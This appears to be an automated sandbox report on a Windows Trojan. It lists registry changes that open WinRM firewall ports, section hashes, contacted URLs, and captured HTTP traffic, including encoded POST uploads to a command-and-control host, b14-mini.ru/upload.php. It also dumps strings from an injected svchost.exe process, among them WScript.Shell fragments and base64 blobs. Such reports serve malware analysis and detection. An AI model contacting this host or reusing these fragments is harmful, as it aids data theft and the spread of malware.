[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 F9 86 89 ED AB 6A 7C 34 AE C1 C9 41 D1 78 26"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

The process mscorsvw.exe:3568 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 21 C1 1A 36 D0 6C F5 00 3C DB 6D 66 6B 6C 16"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process wsmanhttpconfig.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 43 7F 13 C4 2E C4 54 11 C6 A3 C8 84 72 BC 82"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http://+:47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https://+:5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "5404E53D-7E8A-4A45-BDDA-003E6978AD0D"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

The process wsmanhttpconfig.exe:2476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E E5 4B DA 88 89 66 C2 0C BE B3 59 94 DA 14 26"

Dropped PE files


HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 24771 28672 4.10867 629b5b3d630bf33b0fbc95752e350ea7
.rdata 32768 11819 12288 2.93187 f1f77ea729a6a576c2f397dab86ffccc
.data 45056 4811 8192 2.92036 4d06792bdde02c5ee7743f9d56449e6b
.rsrc 53248 245760 245760 5.50102 348d7bbcbeca823fca723a90d7ebeba3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://b14-mini.ru/upload.php 109.70.26.37
hxxp://microsoft.com/ 23.96.52.53
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe 84.53.167.128
hxxp://www.microsoft.com/ 184.86.56.154
hxxp://www.microsoft.com/uk-ua/ 184.86.56.154


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.microsoft.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Sat, 05 Dec 2015 02:34:47 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
....



GET /uk-ua/ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.microsoft.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.5
CorrelationVector: feX1hbJk9E tNufX.1.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 81287
Date: Sat, 05 Dec 2015 02:34:47 GMT
Connection: keep-alive
Set-Cookie: MS-CV=feX1hbJk9E tNufX.1; domain=.microsoft.com; expires=Sun, 06-Dec-2015 02:34:47 GMT; path=/
Set-Cookie: MS-CV=feX1hbJk9E tNufX.2; domain=.microsoft.com; expires=Sun, 06-Dec-2015 02:34:47 GMT; path=/
X-CCC: SE
X-CID: 2

<<< skipped >>>

POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 248
Cache-Control: no-cache

RfNdyd6dbJnEasEi637v9XV0Ht4Ts1AGe84E zdibtvaNNPF0Ux6n3sjXY6AcbWY1d12EahxkNnbbEKbMk2JKVdKPqh3vPyG/y4Hxbn1el7oW5vO6RMwordMf/3Jae5ysqFOtmRjqM7JPWpSzmuMJxpQ9g/gpqd0fLDQyUgcI6anrbjHFdkdcVdX7LgJYR dogryM kxWdCwDxnBv w HE9ee2QoUnh13xC5o6rudrD/i1LoasZ98w==
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Dec 2015 02:34:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: DENY

<<< skipped >>>

GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1; MS-CV=feX1hbJk9E tNufX.2


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Sat, 05 Dec 2015 02:34:51 GMT
Connection: close

<<< skipped >>>

POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 236
Cache-Control: no-cache

EfZZw4jJYr6ypwQi1bIU6HCN7f4E/9Wyoh8aKIoEFv hBB m50i5X7he3n7 3/GzXIS66xedfYeVG3zIWXv39d2H0KbDtzvU9bXAomnfXTamqzaFIlPXKNq9Oa4kgiAISTmiyNgLyW7qonrCoN4SqzJYSjUMDE9O1zZjGDUoTR/6oJbnJN9BDE891Fg3l2punVaIQAMc0AlerC4wO/Gc8jIDeqMy9Fp2jusIqOQHJA==
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Dec 2015 02:34:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: DENY

<<< skipped >>>

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 05 Dec 2015 02:34:46 GMT
Content-Length: 148


The Trojan connects to the servers at the following location(s):

svchost.exe_152:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
c:\%original file name%.exe path<<c:\%original file name%.exe>>path

svchost.exe_152_rwx_00090000_000B2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j 
sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp 